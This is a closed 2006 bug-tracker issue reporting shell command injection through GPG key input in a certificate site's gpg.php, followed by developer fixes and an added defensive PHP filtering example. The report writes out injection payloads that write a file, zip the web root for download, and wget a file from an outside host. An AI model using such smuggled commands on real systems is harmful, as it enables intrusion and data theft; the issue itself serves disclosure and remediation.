View Issue Details

ID: 0000245
Project: Main CAcert Website
Category: GPG/PGP
View Status: public
Last Update: 2013-11-20 22:23
Reporter: TheSourcerer
Assigned To:
Priority: normal
Severity: block
Reproducibility: always
Status: closed
Resolution: fixed
Fixed in Version: 2006
Summary: 0000245: Shell escape
Description: The following GPG keys can be used to exploit a hole in the system:

   "; echo "Hi" >/tmp/test ; echo "

   "; zip -r /www/www/leak.zip /www ; echo "

   " ; wget http://www2.futureware.at/HoleInOne ; echo "

results in the following request:

72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2"


The hole is in the www/gpg.php line 45
Tags: No tags attached.

Relationships

related to 0000148 (closed): site shouldn't rely on magic_quotes_gpc turned on

Activities

bluec

2006-05-28 22:06

manager   ~0000234

This exploit was not possible some weeks ago. Updating the php might have introduced configuration changes.

Seems to me as if magic_quotes_gpc has been turned off (that's the Debian default) or magic_quotes_sybase has been turned on as well (which would break the functionality of magic_quotes_gpc).

Possible solution:

1. turn on magic_quotes_gpc in php configuration
2. make sure magic_quotes_sybase is turned off
3. add something like

  function check_quotes($value)
  {
    return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value);
  }

duane

2006-05-28 23:13

developer   ~0000235

Line 44 actually...

- $gpgkey = $_POST['CSR'];
+ $gpgkey = escapeshellarg($_POST['CSR']);
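Review bot: escapeshellarg() returns the value wrapped in its own single quotes, so if line 44's $gpgkey is still interpolated inside the double quotes that the reporter's payloads (each starting with `";`) break out of, gpg receives the literal quote characters as part of the key, which is the breakage the next note reports. Either remove the command string's own quoting around $gpgkey, or avoid the shell entirely by handing the key to gpg on stdin or through a temporary file, which also makes the magic_quotes_gpc question from 0000148 irrelevant for this line. Note also that this hunk reads $_POST['CSR'] without stripslashes(), so if magic_quotes_gpc is turned on as proposed above, the escaped value will still contain backslashes.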

duane

2006-05-28 23:55

developer   ~0000236

Last edited: 2006-05-29 00:03

escapeshellarg breaks gpg keys, instead a new function was created to only allow base64 chars...

    function clean_csr($CSR)
    {
        // keep only base64 characters plus the line breaks, '-', ':', '=', '+', '/' and spaces found in an armored block
        return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR));
    }

$gpgkey = clean_csr(stripslashes($_REQUEST['CSR']));
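The two notes above describe the same defence from two angles: bluec's magic_quotes handling and duane's character whitelist. The following is an added example, not code from CAcert's gpg.php, showing a whitelist filter in the spirit of clean_csr(), a structural check on the filtered value, and a way to pass the key to gpg without going through /bin/sh at all. The key block and the payload are constructed samples; the parameter name $_REQUEST['CSR'] is the one the page uses, and the gpg invocation assumes PHP 7.4 or later (array form of proc_open()) and GnuPG 2.2 or later (--show-keys).

```php
<?php
// Added example, not CAcert's gpg.php. Inputs below are constructed samples.

// Keep only characters that occur in an ASCII-armored PGP block: the base64
// alphabet and '=' padding, line breaks, and the '-', ':' and ' ' used in the
// BEGIN/END lines and the "Version:" header. Everything else (quotes, ';',
// '>', '|', '$', '`', ...) is dropped, so a payload like the reporter's loses
// its shell metacharacters before any command line is built.
function clean_csr(string $csr): string
{
    return preg_replace('/[^A-Za-z0-9\n\r\-:=+\/ ]/', '', $csr);
}

// Second line of defence: only accept input that still looks like an armored
// public key block after filtering, so junk never reaches gpg at all.
function looks_like_armored_key(string $csr): bool
{
    return preg_match(
        '/^-----BEGIN PGP PUBLIC KEY BLOCK-----\r?\n[\s\S]*-----END PGP PUBLIC KEY BLOCK-----\s*$/',
        $csr
    ) === 1;
}

// Hand the key to gpg on stdin instead of interpolating it into a command
// string. Passing an array to proc_open() (PHP >= 7.4) starts gpg directly,
// with no shell in between, so quoting cannot be broken out of. Returns
// gpg's stdout (the parsed key listing).
function gpg_show_key(string $armored): string
{
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['gpg', '--batch', '--show-keys'], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start gpg');
    }
    fwrite($pipes[0], $armored);
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// --- constructed inputs (stand-ins for $_REQUEST['CSR']) -------------------
$payload   = "\"; echo \"Hi\" >/tmp/test ; echo \"";   // pattern from the report
$sampleKey = "-----BEGIN PGP PUBLIC KEY BLOCK-----\n"
           . "Version: constructed sample\n\n"
           . "mQENBFexampleBASE64lines+/==\n"
           . "=AbCd\n"
           . "-----END PGP PUBLIC KEY BLOCK-----\n";

$clean = clean_csr($payload);
echo "filtered payload: [" . $clean . "]\n";   // quotes, ';' and '>' are gone
echo "payload accepted as key? " . (looks_like_armored_key($clean) ? 'yes' : 'no') . "\n";

$cleanKey = clean_csr($sampleKey);
echo "sample key unchanged by filter? " . ($cleanKey === $sampleKey ? 'yes' : 'no') . "\n";
echo "sample key accepted? " . (looks_like_armored_key($cleanKey) ? 'yes' : 'no') . "\n";
```

Run with `php example.php`: the payload comes out as plain words with no metacharacters and is rejected by the structural check, while the armored sample passes the filter untouched and is accepted. On a host with gpg installed, `gpg_show_key($cleanKey)` can then be used in place of a shell command built from the value; the page's stripslashes() step is only needed while magic_quotes_gpc is on (it was removed in PHP 5.4), and the whitelist would discard any leftover backslashes anyway.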

Issue History

Date Modified Username Field Change
2006-05-28 21:15 TheSourcerer New Issue
2006-05-28 21:51 bluec Relationship added related to 0000148
2006-05-28 22:06 bluec Note Added: 0000234
2006-05-28 23:13 duane Note Added: 0000235
2006-05-28 23:55 duane Note Added: 0000236
2006-05-28 23:56 duane Status new => closed
2006-05-28 23:56 duane Resolution open => fixed
2006-05-28 23:56 duane Fixed in Version => production
2006-05-29 00:03 duane Note Edited: 0000236
2013-01-14 08:46 Werner Dworak Fixed in Version => 2006
2013-11-20 22:23 NEOatNHNG View Status private => public